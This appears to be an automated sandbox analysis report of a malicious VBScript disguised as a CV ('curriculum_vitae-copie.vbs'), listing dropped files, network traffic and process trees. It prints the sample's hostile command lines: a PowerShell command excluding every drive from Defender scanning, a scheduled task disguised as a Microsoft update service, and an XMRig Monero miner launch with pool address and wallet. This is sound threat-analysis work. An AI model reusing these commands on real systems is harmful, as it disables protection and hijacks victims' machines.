Preview:	7z..'...3ss.@.......@.........../..\#.\|.o.<.j...M..K.y..&..x.x......\|V.....6D...m@W[.......~n.....S..Ht!.m\|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$....w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......\|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv\|..M..^....R.K..P.>.=$U..t...5...@..\|.......a.\|8..i!._....'..E._,.#...B..]....S....zO...p......\|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N\|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y...[....)Gaz....6e..._.&Ey.hx%...N%.....NM.3R=d)....wL.8...'pU..Z.....R...(.3../.FQ...T..........Hy.e .v'....K.:.....&....JBb]>..........3...v.1.~!.............$...@...R.IkU4P......tLT.\'1.......9(]....qF-........kg..L.m..X.k.7./.UW.eII..BS+....x.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhh2tk2.a5a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwlcfquj.2yb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

\Device\ConDrv

Download File

Process:	C:\Users\Public\7g.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	533
Entropy (8bit):	5.0064685715477655
Encrypted:	false
SSDEEP:	12:psrr6QRwWOTjELnFsoBkk3oQv1fRAI0VtN5v:parnwFTjQFbBkk3oQvRRAI8tDv
MD5:	115C929088A166024218C6B1F99B89B1
SHA1:	871A09AF343C9969318B27EE1FB1762AABCA57E7
SHA-256:	5361ECF26BAC65FC26C3E4B65728434D4787641864F2AD13C6015210A05CEE08
SHA-512:	5A1F586C3FF929DEB917F506022532D41D6A14770CCE0292F78CD196A74178C88EC04CFA25F27B16CA058D674756CCEE18B34BAFAF488987EE18C6D4E208C08E
Malicious:	false
Preview:	..7-Zip (r) 23.00 (x86) : Igor Pavlov : Public domain : 2023-05-07....Scanning the drive for archives:.. 0M Scan C:\Users\Public\. .1 file, 1960608 bytes (1915 KiB)....Extracting archive: C:\Users\Public\gmail.7z..--..Path = C:\Users\Public\gmail.7z..Type = 7z..Physical Size = 1960608..Headers Size = 544..Method = LZMA2:6m BCJ 7zAES..Solid = +..Blocks = 6.... 0%. . 61% 4. . 88% 5 - WinRing0x64.sys. .Everything is Ok....Files: 8..Size: 5425957..Compressed: 1960608..

Static File Info

General

File type:	assembler source, ASCII text, with very long lines (52487)
Entropy (8bit):	0.5286514443234819
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	curriculum_vitae-copie.vbs
File size:	283689
MD5:	f72b1d9e4780f7b1b63fc2e2e88f1593
SHA1:	95f3a182de433dac071eb353f1abd50b8643aabe
SHA256:	4a346ad97d3b8093e61c3a0ab67a1a6611fb5c399725eea10becbdd0f331ee13
SHA512:	08af647e5eeeef376121f0999b8bac974b4a0a8976e8dde58f37af3f2f2895ddcd772c371d873637ef0b8a5d9c38cc2208c5773bfa84ab4b22efab6ade4ce6e9
SSDEEP:	192:ZxI1d8fxPUiXdKUV+lxq3S+JLGJGaxn6AZs0tuPQaZrr1HVSFNC7aFAZxJpSFqaS:rI1ifJjAXq35G3s0t4Q1C7PLnH03y
TLSH:	0654A7C58CC08118DA57E0B081EF52232B45D8FABB547626CC74A1549E3FF58B72DADB
File Content Preview:	L5Ha87xJcL5 = FormatNumber(34,88).L5y03ESt6GOEL5 = FormatNumber(87,78).L5R21819rL5 = FormatNumber(29,7).L5Q2btcH3zQL5 = Second(182841).L5o0AI9Nw8vL5 = Second(517662).L5s97PU0GTL5 = Second(168144)...L5wasthppwHL5 = Now().L5G1KCY2CL5 = Now().L5z7fCkGjMVwL5

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2023 17:28:27.612818956 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.612884998 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.612957001 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.631351948 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.631393909 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.697961092 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.698071003 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.937997103 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.938043118 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.938687086 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.938765049 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.941720009 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.983105898 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.983141899 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.983166933 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.983226061 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.983272076 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:27.983288050 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.983303070 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:27.983390093 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.003807068 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.003853083 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.003981113 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.004019976 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.004029989 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.004060984 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.004188061 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.004326105 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.004358053 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.004448891 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.004458904 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.004554033 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025082111 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025125027 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025218964 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025249004 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025288105 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025319099 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025337934 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025346994 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025372028 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025402069 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025449038 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025456905 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025500059 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025615931 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025648117 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025686979 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025696993 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025746107 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025867939 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025909901 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.025948048 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.025958061 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026006937 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.026098013 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026133060 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026321888 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.026331902 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026382923 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026416063 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026453018 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.026463032 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.026495934 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.026532888 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.047033072 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047068119 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047172070 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.047202110 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047322989 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.047373056 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047405005 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047446966 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.047455072 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047506094 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.047745943 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047776937 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047846079 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.047856092 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.047934055 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.048547983 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.048582077 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.048707008 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.048707008 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.048718929 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.048860073 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.048896074 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.048932076 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.048943043 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.048970938 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.049016953 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.049149990 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.049189091 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.049227953 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.049237013 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.049263000 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.049290895 CEST	49712	443	192.168.2.6	49.12.202.237
Jun 6, 2023 17:28:28.049443007 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.049474955 CEST	443	49712	49.12.202.237	192.168.2.6
Jun 6, 2023 17:28:28.049524069 CEST	49712	443	192.168.2.6	49.12.202.237

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2023 17:28:27.573199034 CEST	63229	53	192.168.2.6	8.8.8.8
Jun 6, 2023 17:28:27.601299047 CEST	53	63229	8.8.8.8	192.168.2.6
Jun 6, 2023 17:28:28.268532991 CEST	62538	53	192.168.2.6	8.8.8.8
Jun 6, 2023 17:28:28.294302940 CEST	53	62538	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 6, 2023 17:28:27.573199034 CEST	192.168.2.6	8.8.8.8	0xd5ae	Standard query (0)	www.7-zip.org	A (IP address)	IN (0x0001)	false
Jun 6, 2023 17:28:28.268532991 CEST	192.168.2.6	8.8.8.8	0xf57d	Standard query (0)	gitlab.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 6, 2023 17:28:27.601299047 CEST	8.8.8.8	192.168.2.6	0xd5ae	No error (0)	www.7-zip.org		49.12.202.237	A (IP address)	IN (0x0001)	false
Jun 6, 2023 17:28:28.294302940 CEST	8.8.8.8	192.168.2.6	0xf57d	No error (0)	gitlab.com		172.65.251.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.7-zip.org

gitlab.com

Target ID:	0
Start time:	17:25:49
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wscript.exePID: 6984, Parent PID: 3484

General

Target ID:	5
Start time:	17:25:52
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 7080, Parent PID: 6984

General

Target ID:	6
Start time:	17:25:56
Start date:	06/06/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Imagebase:	0x7ff7cb270000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5932, Parent PID: 7080

General

Target ID:	7
Start time:	17:25:56
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 7028, Parent PID: 7080

General

Target ID:	8
Start time:	17:25:56
Start date:	06/06/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Imagebase:	0x7ff7466a0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: 7g.exePID: 5428, Parent PID: 6984

General

Target ID:	11
Start time:	17:28:29
Start date:	06/06/2023
Path:	C:\Users\Public\7g.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Imagebase:	0x3b0000
File size:	584704 bytes
MD5 hash:	F7D5BA4EC2A88F2FF1F0ABEC61108A0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low

Analysis Process: conhost.exePID: 4384, Parent PID: 5428

General

Target ID:	12
Start time:	17:28:30
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 5724, Parent PID: 6984

General

Target ID:	13
Start time:	17:28:50
Start date:	06/06/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Imagebase:	0x7ff7cb270000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5272, Parent PID: 5724

General

Target ID:	14
Start time:	17:28:50
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: wscript.exePID: 5244, Parent PID: 6984

General

Target ID:	15
Start time:	17:28:50
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exePID: 6028, Parent PID: 5724

General

Target ID:	16
Start time:	17:28:50
Start date:	06/06/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Imagebase:	0x7ff7db310000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: wscript.exePID: 4860, Parent PID: 1064

General

Target ID:	17
Start time:	17:28:52
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

Analysis Process: mservice.exePID: 3476, Parent PID: 4860

General

Target ID:	19
Start time:	17:28:53
Start date:	06/06/2023
Path:	C:\Users\Public\WindowsUpdate\mservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Imagebase:	0x7ff7a0a50000
File size:	4770304 bytes
MD5 hash:	CFC0000B993A31C11EF58AC53837E4E1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000013.00000002.992637368.0000018540500000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth (Nextron Systems) Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems) Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems) Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs

Analysis Process: conhost.exePID: 3536, Parent PID: 3476

General

Target ID:	20
Start time:	17:28:54
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: wscript.exePID: 4620, Parent PID: 4860

General

Target ID:	21
Start time:	17:28:54
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: wscript.exePID: 6596, Parent PID: 3452

General

Target ID:	22
Start time:	17:29:00
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000016.00000002.880872368.000001959AF15000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

Analysis Process: wscript.exePID: 6548, Parent PID: 6596

General

Target ID:	23
Start time:	17:29:01
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
